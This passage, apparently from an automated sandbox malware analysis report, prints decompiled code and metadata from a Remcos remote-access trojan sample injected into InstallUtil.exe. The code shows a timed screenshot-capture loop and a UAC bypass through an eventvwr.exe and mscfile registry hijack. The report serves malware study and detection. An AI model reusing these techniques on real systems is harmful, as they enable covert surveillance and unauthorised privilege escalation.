											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												E004427C2( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												E004427C2( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xcbd5
												E004427C2( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xcbd5
										E004427C2( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										E004427C2(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E004318FB(_v8 ^ _t262);
				}
				L47:
			}

0x0044123c
0x00441244
0x0044124b
0x0044124e
0x0044124f
0x00441252
0x00441256
0x00441257
0x0044125a
0x0044126a
0x00441276
0x0044128d
0x00441292
0x00441297
0x004412ac
0x004412af
0x004412af
0x004412b2
0x004412b8
0x004412c1
0x004412c3
0x004412c6
0x004412cd
0x004412d0
0x004412d6
0x00000000
0x00000000
0x004412d8
0x004412dc
0x00441305
0x00441305
0x004412de
0x004412de
0x004412e2
0x004412e6
0x004412ed
0x004412f3
0x00000000
0x004412f5
0x004412f5
0x004412f8
0x004412fb
0x00441303
0x00000000
0x00000000
0x00000000
0x00000000
0x00441303
0x004412f3
0x00441312
0x00441312
0x00441314
0x0044131a
0x00441320
0x00441323
0x00441323
0x00441326
0x00441329
0x00441329
0x00441339
0x00441347
0x0044134c
0x00441353
0x00441355
0x00000000
0x0044135b
0x00441361
0x00441367
0x0044136e
0x00441374
0x00441377
0x0044137d
0x0044138a
0x00441391
0x00441396
0x00441399
0x0044139b
0x004415f4
0x004415fa
0x004415fb
0x004415fc
0x004415fd
0x004415fe
0x004415ff
0x00441604
0x00441605
0x0044160a
0x004413a1
0x004413a1
0x004413af
0x004413b2
0x004413cd
0x004413d4
0x004413da
0x004413e0
0x004413b4
0x004413b4
0x004413bc
0x00000000
0x004413be
0x004413be
0x004413c4
0x004413c4
0x004413bc
0x004413e7
0x004413ea
0x00441507
0x0044150a
0x00441517
0x0044151a
0x00441522
0x00441522
0x0044150c
0x00441512
0x00441512
0x004413f0
0x004413f0
0x004413f6
0x004413fe
0x00441400
0x00441403
0x0044140c
0x00441415
0x0044141b
0x0044141b
0x0044141e
0x00441420
0x00000000
0x00000000
0x00441422
0x00441428
0x00441429
0x00441434
0x0044143c
0x00441444
0x00441447
0x0044144a
0x00441450
0x00441456
0x0044145c
0x00441462
0x00441465
0x00000000
0x00000000
0x00441467
0x0044148c
0x0044148c
0x0044148f
0x00441493
0x004414ac
0x004414b1
0x004414b4
0x004414b6
0x004414bc
0x004414f7
0x004414be
0x004414be
0x004414c3
0x004414cb
0x004414cc
0x004414cc
0x004414e3
0x004414ea
0x004414ed
0x004414f2
0x004414f2
0x004414fa
0x004414fd
0x004414fd
0x00441502
0x00000000
0x00441502
0x00441469
0x0044146b
0x00441470
0x00441476
0x0044147f
0x00441488
0x00441488
0x00000000
0x0044146b
0x00441525
0x00441525
0x00441529
0x00441531
0x00441537
0x0044153a
0x00441540
0x00441542
0x00441582
0x00441588
0x0044158f
0x0044158f
0x00441595
0x00441599
0x00000000
0x0044159b
0x0044159b
0x0044159f
0x004415a4
0x004415a8
0x004415ad
0x004415b4
0x004415c2
0x004415c8
0x004415cb
0x004415cb
0x00441599
0x004415da
0x004415e2
0x004415eb
0x00441544
0x0044154a
0x0044154d
0x00441554
0x00441566
0x0044156d
0x0044157a
0x00000000
0x0044157a
0x00000000
0x00441542
0x0044139b
0x00441316
0x00000000
0x00441316
0x00000000
0x00441314
0x0044130d
0x0044130f
0x0044130f
0x00000000
0x00441299
0x00441299
0x0044129b
0x004412ab
0x004412ab
0x00000000

APIs

Part of subcall function 00444255: GetLastError.KERNEL32(?,0043DA65,00437135,0043DA65,0046E278,?,0043B7CA,FF8BC35D,0046E278,0046E278), ref: 00444259
Part of subcall function 00444255: _free.LIBCMT ref: 0044428C
Part of subcall function 00444255: SetLastError.KERNEL32(00000000,FF8BC35D,0046E278,0046E278), ref: 004442CD
Part of subcall function 00444255: _abort.LIBCMT ref: 004442D3

_memcmp.LIBVCRUNTIME ref: 004414E3
_free.LIBCMT ref: 00441554
_free.LIBCMT ref: 0044156D
_free.LIBCMT ref: 0044159F
_free.LIBCMT ref: 004415A8
_free.LIBCMT ref: 004415B4

Strings

<@, xrefs: 00441531
C, xrefs: 004413A1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: <@$C
API String ID: 1679612858-110480577
Opcode ID: 1048d56563eeec5036fde7c123c800c622b58e08fc70498468e367d4350c89e2
Instruction ID: 5577a6a45bcddffb5f6216a997b053df11b1957fa34d8d06bb10a8a0fa2b22ac
Opcode Fuzzy Hash: 1048d56563eeec5036fde7c123c800c622b58e08fc70498468e367d4350c89e2
Instruction Fuzzy Hash: CAB13C75A012199FEB24DF19C884AAEB7B4FB48304F5045EEE949A7360D774AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00416832 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00416832() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E00453798(E00453BAF, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x46de94 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E00415151(_t131);
					__imp__GdiplusStartup(0x46de94, _t131, 0);
				}
				_t150 =  *0x46dd64 - _t92; // 0x0
				if(_t150 == 0) {
					E00401ED3(0x46e980, _t132, _t141, E00415D23(_t146 - 0x40, _t132));
					E00401EC9();
				}
				_t42 = E00401F6B(E00401E25(0x46e600, _t132, _t146, _t150, 0x19));
				_t45 = E00401EC4(E00418385(_t146 - 0x58, E00401E25(0x46e600, _t132, _t146, _t150, 0x1a)));
				_t134 =  *_t42;
				E00401ED3(0x46e968,  *_t42, 0x46e968, E0041905E(_t146 - 0x40,  *_t42, _t45));
				E00401EC9();
				E00401EC9();
				CreateDirectoryW(E00401EC4(0x46e968), _t92);
				E00401F46(_t92, _t146 - 0xb0);
				E00401F46(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x46dd5b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E0041512B(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00401ED3(_t146 - 0x80, _t66, _t145, E00402FD4(_t92, _t146 - 0x58, E00402FD4(_t92, _t146 - 0x40, E004078F9(_t146 - 0x98, 0x46e968, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, "."));
						E00401EC9();
						E00401EC9();
						E00401EC9();
						_t72 = E00401EC4(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E00416668(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E004383EC(_t75, E00401F6B(E00401E25(0x46e600, _t134, _t146, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E004383EC(_t79, E00401F6B(E00401E25(0x46e600, _t134, _t146, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00401F6B(E00401E25(0x46e600, _t134, _t146, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0040413E(_t92, _t148, _t134, _t146, _t83);
						_t85 = E00418A82(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

0x00416837
0x00416843
0x00416845
0x00416848
0x0041684a
0x0041684d
0x00416853
0x00416855
0x00416858
0x0041685b
0x00416869
0x00416869
0x0041686f
0x00416875
0x00416885
0x0041688d
0x0041688d
0x004168a2
0x004168be
0x004168c4
0x004168d7
0x004168df
0x004168e7
0x004168f5
0x00416901
0x00416909
0x0041690e
0x00416911
0x00416922
0x00416928
0x0041692b
0x0041692e
0x00000000
0x00416934
0x00416937
0x0041697f
0x00416983
0x0041698d
0x00416992
0x00416997
0x0041699c
0x004169a1
0x004169af
0x004169b4
0x004169f3
0x004169fb
0x00416a03
0x00416a0e
0x00416a16
0x00416a1e
0x00416a23
0x00416a30
0x00416a33
0x00416a51
0x00416a53
0x00416a6a
0x00416a6a
0x00416a35
0x00416a49
0x00416a49
0x00416a72
0x00416a74
0x00000000
0x00416a74
0x00416939
0x0041693e
0x00416941
0x00416941
0x00416943
0x00000000
0x00000000
0x00416953
0x00416958
0x0041695e
0x00416965
0x0041696a
0x0041696d
0x0041696f
0x00416974
0x00000000
0x00000000
0x0041697b
0x0041697b
0x00000000
0x00416941

APIs

__EH_prolog.LIBCMT ref: 00416837
GdiplusStartup.GDIPLUS(0046DE94,?,00000000), ref: 00416869

Part of subcall function 00416668: SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004166C1
Part of subcall function 00416668: DeleteFileW.KERNEL32(00000000,0000001B,?,00000000), ref: 00416752

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004168F5
Sleep.KERNEL32(000003E8), ref: 0041697B
GetLocalTime.KERNEL32(?), ref: 00416983
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00416A72

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00416918, 00416939, 004169A7
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041691D

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CreateSleep$DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 198735477-3790400642
Opcode ID: 2794c85a3811543ca87b7101c6f09f6a5fdd6faffe9bcd6634c62b7f9fcd2b77
Instruction ID: ce0ddbc7aa7556f63f789618e214f7464cfce56c68888e1c6d0d9b9a3e5ecacd
Opcode Fuzzy Hash: 2794c85a3811543ca87b7101c6f09f6a5fdd6faffe9bcd6634c62b7f9fcd2b77
Instruction Fuzzy Hash: A4517F71A002549ACB04BBB6CC666EE77A9AF55309F00007FF405B71E2EE3C9D85C799

Uniqueness

Uniqueness Score: -1.00%

Function 00405FCD Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00405FCD(void* __ebx, void* __ecx, void* __edx) {
				char _v28;
				char _v52;
				void* __ebp;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t24;
				void* _t28;
				void* _t50;
				void* _t51;

				_t28 = __ecx;
				if( *0x46c9c0 != 0) {
					return 1;
				}
				_t8 = E0040616B(__ecx);
				__eflags = _t8 - 0x3a9f;
				if(_t8 < 0x3a9f) {
					_push(_t28);
					E00410B1D( &_v28, 0x80000000, "mscfile\\shell\\open\\command", 0x461084);
					_t10 = E0040243C();
					_t11 = E00401F6B(0x46e5e8);
					_t12 = E0040243C();
					_t14 = E00401F6B( &_v28);
					E00410EBB(E00401F6B(0x46e5a0), __eflags, "origmsc", _t14, _t12 + 1, _t11, _t10);
					_push(2);
					E0040413E(__ebx, _t51 + 0x18 - 0x18, _t15, _t50, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
					_push(0x4610ec);
					E00410D87(0x80000001, L"Software\\Classes\\mscfile\\shell\\open\\command");
					E00419012( &_v52, 0x34, "eventvwr.exe");
					_t21 = ShellExecuteW(0, L"open", E00401EC4( &_v52), 0x4610ec, 0x4610ec, 0);
					__eflags = _t21 - 0x20;
					if(_t21 <= 0x20) {
						E00401EC9();
						E00401F98();
						_t24 = 2;
						return _t24;
					}
					ExitProcess(0);
				}
				return _t8;
			}

0x00405fcd
0x00405fdb
0x00000000
0x00405fdf
0x00405fe5
0x00405fea
0x00405fef
0x00405ff5
0x00406008
0x00406016
0x0040601e
0x00406027
0x00406031
0x00406048
0x00406050
0x0040605c
0x0040606b
0x00406071
0x00406080
0x0040609c
0x004060a2
0x004060a5
0x004060b2
0x004060ba
0x004060c1
0x00000000
0x004060c1
0x004060a9
0x004060a9
0x004060c6

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040609C
ExitProcess.KERNEL32 ref: 004060A9

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, xrefs: 00406057
open, xrefs: 00406095
origmsc, xrefs: 00406037
eventvwr.exe, xrefs: 00406076
mscfile\shell\open\command, xrefs: 00405FFB
Software\Classes\mscfile\shell\open\command, xrefs: 00406066

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-764209389
Opcode ID: 06ca3f3384782627d30c825c711d39c2dfa1a3fcc9e01c627d626a4fa05f1e9a
Instruction ID: cc03ee05f47f5838a6603ec0c7285f0b31397286879bee9164bb4503c7af3d3b
Opcode Fuzzy Hash: 06ca3f3384782627d30c825c711d39c2dfa1a3fcc9e01c627d626a4fa05f1e9a
Instruction Fuzzy Hash: C611F071A442016ADB14B2A2DC57FEF32689B00709F50003FF502BA1E2EEBC5885829E

Uniqueness

Uniqueness Score: -1.00%

Function 00419D46 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D46(void* __eflags) {
				struct tagMSG _v32;
				char _v300;
				int _t14;

				GetModuleFileNameA(0,  &_v300, 0x104);
				 *0x46debc = E00419DF8();
				0x46deb8->cbSize = 0x1fc;
				 *0x46dec0 = 1;
				 *0x46dec8 = 0x401;
				 *0x46decc = ExtractIconA(0,  &_v300, 0);
				lstrcpynA(0x46ded0, "Remcos", 0x80);
				 *0x46dec4 = 7;
				Shell_NotifyIconA(0, 0x46deb8);
				while(1) {
					_t14 = GetMessageA( &_v32, 0, 0, 0);
					if(_t14 == 0) {
						break;
					}
					TranslateMessage( &_v32);
					DispatchMessageA( &_v32);
				}
				return _t14;
			}

0x00419d5f
0x00419d6a
0x00419d78
0x00419d82
0x00419d8c
0x00419dab
0x00419db0
0x00419dbc
0x00419dc6
0x00419de2
0x00419de9
0x00419df1
0x00000000
0x00000000
0x00419dd2
0x00419ddc
0x00419ddc
0x00419df7

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00419D5F

Part of subcall function 00419DF8: RegisterClassExA.USER32(00000030), ref: 00419E44
Part of subcall function 00419DF8: CreateWindowExA.USER32 ref: 00419E5F
Part of subcall function 00419DF8: GetLastError.KERNEL32 ref: 00419E69

ExtractIconA.SHELL32(00000000,?,00000000), ref: 00419D96
lstrcpynA.KERNEL32(0046DED0,Remcos,00000080), ref: 00419DB0
Shell_NotifyIconA.SHELL32(00000000,0046DEB8), ref: 00419DC6
TranslateMessage.USER32(?), ref: 00419DD2
DispatchMessageA.USER32 ref: 00419DDC
GetMessageA.USER32 ref: 00419DE9

Strings

Remcos, xrefs: 00419DA1

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 3eaa85d4fba7fccbdf8ac3d96a38bd6b0f7f78d731f301dc6a2c1f84f57ee185
Instruction ID: 27bb3bb9e9425415d9785be7a8916ce8a2329f455831ddd7e5a75271eee1e707
Opcode Fuzzy Hash: 3eaa85d4fba7fccbdf8ac3d96a38bd6b0f7f78d731f301dc6a2c1f84f57ee185
Instruction Fuzzy Hash: 470152B1E04309ABC7109FA1ED4DEDB7ABCBBE5706F00002AF5119A161E7F99485CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00448A74 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00448A74(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E0043992E();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00439941())) = 9;
						L59:
						_t145 = E0043862C();
						goto L60;
					}
					__eflags = _t213 -  *0x46da00; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E004421F7(_t224, _t158);
								E004427C2(0);
								E004427C2(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00447364(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x46d800 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x46d800 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0044FDE4(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E0043990B(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00439941())) = 9;
											 *(E0043992E()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E004485D0();
												} else {
													_t176 = E004488E0();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00448790(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x46d800 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00439941())) = 0xc;
									 *(E0043992E()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E004427C2(_t246);
									return _t242;
								}
							}
							L15:
							 *(E0043992E()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00439941())) = 0x16;
							E0043862C();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E0043992E()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00439941())) = 0x16;
					goto L59;
				} else {
					 *(E0043992E()) =  *_t212 & 0x00000000;
					_t145 = E00439941();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x00448a7d
0x00448a84
0x00448a9e
0x00448aa0
0x00448e08
0x00448e08
0x00448e0d
0x00448e0d
0x00448e15
0x00448e1b
0x00448e1b
0x00000000
0x00448e1b
0x00448aa6
0x00448aac
0x00000000
0x00000000
0x00448ab4
0x00448ac0
0x00448ac3
0x00448ac6
0x00448ac9
0x00448ad0
0x00448ad3
0x00448ad7
0x00448ada
0x00448add
0x00000000
0x00000000
0x00448ae3
0x00448ae6
0x00448aec
0x00448b06
0x00448b08
0x00448e04
0x00000000
0x00448e04
0x00448b0e
0x00448b12
0x00000000
0x00000000
0x00448b18
0x00448b1c
0x00000000
0x00000000
0x00448b23
0x00448b27
0x00448b2a
0x00448b2d
0x00448b32
0x00448b32
0x00448b35
0x00448b52
0x00448b57
0x00448b59
0x00448b5b
0x00448b7b
0x00448b7c
0x00448b7e
0x00448b81
0x00448b83
0x00448b85
0x00448b87
0x00448b87
0x00448b92
0x00448b94
0x00448b9b
0x00448ba0
0x00448ba3
0x00448ba6
0x00448ba8
0x00448bcd
0x00448bd2
0x00448bd9
0x00448bdc
0x00448bdf
0x00448be3
0x00448be5
0x00448be9
0x00448beb
0x00448bee
0x00448bf1
0x00448bf3
0x00448bf6
0x00448bfd
0x00448c00
0x00448c05
0x00448c08
0x00448c11
0x00448c15
0x00448c18
0x00448c1b
0x00448c1e
0x00448c24
0x00448c26
0x00448c2f
0x00448c32
0x00448c35
0x00448c38
0x00448c39
0x00448c3d
0x00448c43
0x00448c4d
0x00448c52
0x00448c62
0x00448c66
0x00448c69
0x00448c6b
0x00448c6d
0x00448c6f
0x00448c71
0x00448c79
0x00448c7a
0x00448c7d
0x00448c80
0x00448c81
0x00448c87
0x00448c91
0x00448c99
0x00448c9c
0x00448ca8
0x00448cac
0x00448caf
0x00448cb1
0x00448cb3
0x00448cb5
0x00448cb7
0x00448cbf
0x00448cc0
0x00448cc3
0x00448cc6
0x00448cc6
0x00448cc7
